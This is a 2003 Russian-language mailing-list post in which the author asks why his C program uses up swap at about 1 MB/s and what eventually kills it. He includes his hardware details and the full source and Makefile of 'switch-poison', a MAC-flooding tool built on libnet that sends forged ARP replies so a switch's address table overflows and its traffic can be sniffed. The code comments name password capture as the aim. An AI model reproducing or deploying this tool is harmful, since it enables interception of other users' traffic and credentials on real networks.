[Comm] ?: почему эта программа жрет swap w/ speed 1Mb/sec
Oleg K. Artemjev
=?iso-8859-1?q?olli_=CE=C1_rbauto=2Eru?=
Чт Авг 21 10:30:01 MSD 2003
Hi.
subj - на моем Master 2.0 нижевключенный код съедает по 1 метру свапа за одну-две секунды.
Почему? ?-)
И кто его потом прибивает? Я имею ввиду то, что не понятно, что убивает процесс
переевший swap space - к вечеру от программы остается только надпись 'killed'. То есть, вероятно,
это делает ядро, но от какой опции в menuconfig зависит такое поведение? ?-)
Железо:
[root на sky 2dig]# cat /proc/pci | tail -6
Bus 0, device 12, function 0:
Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139 (rev 16).
IRQ 11.
Master Capable. Latency=32. Min Gnt=32.Max Lat=64.
I/O at 0xd400 [0xd4ff].
Non-prefetchable 32 bit memory at 0xe4800000 [0xe48000ff].
[root на sky 2dig]# uname -a
Linux sky.digger.org.ru 2.4.18-altlm2.0-custom #4 SMP Tue Jul 8 05:49:16 MSD 2003 i686 unknown
[root на sky 2dig]# cat /proc/meminfo
total: used: free: shared: buffers: cached:
Mem: 95490048 92807168 2682880 0 12468224 31305728
Swap: 443072512 41533440 401539072
MemTotal: 93252 kB
MemFree: 2620 kB
MemShared: 0 kB
Buffers: 12176 kB
Cached: 18988 kB
SwapCached: 11584 kB
Active: 52632 kB
Inactive: 23544 kB
HighTotal: 0 kB
HighFree: 0 kB
LowTotal: 93252 kB
LowFree: 2620 kB
SwapTotal: 432688 kB
SwapFree: 392128 kB
[root на sky 2dig]#
Код:
/*
* switch-poison.c - switching table poisoning - makes a
* commutator beheve almost like a hub
* with collission separation.
*
* This is a version especially adopted for commutators,
* meaning for switching table overfilling.
*
* Please note, - w/ tcp sessions 1st packet sent via switch
* contains session request & the second may then contain
* an acknowledge & the 3d - a password, thus if you've not
* enough bandwidth to refill all the switch commutation table
* memory (i.e. all it cache memory) between two packets,
* then you need some improvement for this code - all password
* most probably will be sent in the 1st reply packet. There're
* lot's of possible ways to do so - look at ettercap man
* page for most usefull & easy way, or you may try dsmiff, or
* there're more exotic ways. =)
*
* Based on arpoison v0.5 by Steve Buer - changed by
* olli <olli @ digger . org . ru>
*
* Changes: added a loop for src MAC changing, removed
* commandline options - hardcoded are already best addresses,
* if anyway wanna yours - recompile.
*
* ToDo: try to find most invisible way to overfill commutation
* table. Possible vectors are:
*
* 1. Use layer 2 protocols that doesn't interfer w/ IP-based
* stacks. I.e. use ETHERTYPE_LOOPBACK frames (man 3 libnet).
*
* 2. Use IPX or other stack that doesn't interfer with IP-based
* stacks.
*
* Why:
*
* 1. It may be usefull, since it may easily allow network
* investigation without injecting a sencible information.
*
* 2. Just for fun.
*
* BUGS: Current version eats swap space w/ a speed of 1Mb/sec on
* my dual PPro200 w/ 96 RAM w/ no daemons running on 10Mbit/s on
* Realtek 8139. At the end of avalible swap space it may be
* killed by monitoring rules or you may get other results...
*
*
* NO WARRANTY OF ANY KIND.
* EDUCATION ONLY.
*
*
* thanx2: all libnet developers,
* Steve Buer, author of original arpoison,
* Rserg <rserg @ mtcm . ru> .
*/
/* uncomment '#define debug 1' for reports on sent packets.*/
/*
#define debug 1
*/
#include <libnet.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
void get_ip_addr(struct in_addr *, char *);
int main(int argc, char *argv[])
{
/* various variables */
int n, c, c0, c1, c2, c3, c4, c5;
int packet_size = LIBNET_ETH_H + LIBNET_ARP_H;
u_long SrcIP, DstIP;
u_char *packet;
u_char *device;
char err_buf[LIBNET_ERRBUF_SIZE];
struct libnet_link_int *network;
unsigned int p[6];
u_char DstHW[6];
u_char SrcHW[6];
/* parse args */
if (argc != 1)
{
printf("No opts supported.");
printf("This 'll send lots of arp replies to MAC ff:ff:ff:ff:ff:ff,\n");
printf("from statically growing MAC with fromIP 224.0.0.1 &\n");
printf("destIP 224.0.0.1 via device eth0.\n");
printf("to change - change src & recompile.");
exit(1);
}
/* assign predefined values */
DstIP = inet_addr("224.0.0.1");
SrcIP = inet_addr("224.0.0.1");
device = "eth0";
n = sscanf("ff:ff:ff:ff:ff:ff", "%x:%x:%x:%x:%x:%x",
&p[0],&p[1],&p[2],&p[3],&p[4],&p[5]);
for (c = 0;c < 6;c++) {DstHW[c] = p[c];}
/* infinite loop - sending packets */
while (1)
{/*let MAC grow*/
for (c0=0;c0<255;c0++)
{SrcHW[0]=c0;
for (c1=0;c1<255;c1++)
{SrcHW[1]=c1;
for (c2=0;c2<255;c2++)
{SrcHW[2]=c2;
for (c3=0;c3<255;c3++)
{SrcHW[3]=c3;
for (c4=0;c4<255;c4++)
{SrcHW[4]=c4;
for (c5=0;c5<255;c5++)
{SrcHW[5]=c5;
/* --------------Packet construction & sending-------------------- */
/* allocate memory for packet */
n = libnet_init_packet(packet_size, &packet);
if(n != 1){printf("libnet_init_packet: error\n");exit(1);}
/* ethernet header */
n = libnet_build_ethernet(
DstHW, /* dst HW addr */
SrcHW, /* src HW addr */
0x0806, /* ether packet type */
NULL, /* ptr to payload */
0, /* payload size */
packet); /* ptr to packet memory */
if(n == -1){perror("libnet_build_ethernet"); exit(1);}
/* ARP header */
n = libnet_build_arp(
1, /* hardware type */
0x0800, /* proto type */
6, /* hw addr size */
4, /* proto addr size */
2, /* ARP REPLY */
SrcHW, /* source HW addr */
(u_char *)&SrcIP, /* src proto addr */
DstHW, /* dst HW addr */
(u_char *)&DstIP, /* dst IP addr */
NULL, /* no payload */
0, /* payload length */
packet + LIBNET_ETH_H); /* packet buffer memory */
if (n == -1) {perror("libnet_build_arp");exit(1);}
/* open the link-layer interface */
network = libnet_open_link_interface(device, err_buf);
if (network == NULL){perror("libnet_open_link_interface");exit(1);}
/* inject the mofo !! */
n = libnet_write_link_layer(network,device,packet,packet_size);
if (n < packet_size)
{printf("libnet_write_link_layer only wrote %d of %d bytes\n",n,
packet_size);
}
#ifdef debug
/* output */
printf("ARP packet sent via %s\n", device);
#endif
/* Shut down the interface */
n = libnet_close_link_interface(network);
if (n == -1){perror("libnet_close_link_interface");exit(1);}
/* free packet memory */
libnet_destroy_packet(&packet);
/*--------------Packet construction & sending--------------------*/
} /* for c5 */
} /* for c4 */
} /* for c3 */
} /* for c2 */
} /* for c1 */
} /* for c0 */
} /* while(1)*/
}
Собирается так:
-----------------------------------------------------------------------------------------------------
all: arpoison switch-poison
clean:
rm -f arpoison
rm -f switch-poison
arpoison: arpoison.c
gcc -Wall `libnet-config --defines` arpoison.c -o arpoison `libnet-config --libs`
switch-poison: switch-poison.c
gcc -Wall `libnet-config --defines` switch-poison.c -o switch-poison `libnet-config --libs`
install:
cp -f arpoison switch-poison /hbin
-----------------------------------------------------------------------------------------------------
--
Bye.Olli. http://olli.digger.org.ru
Подробная информация о списке рассылки community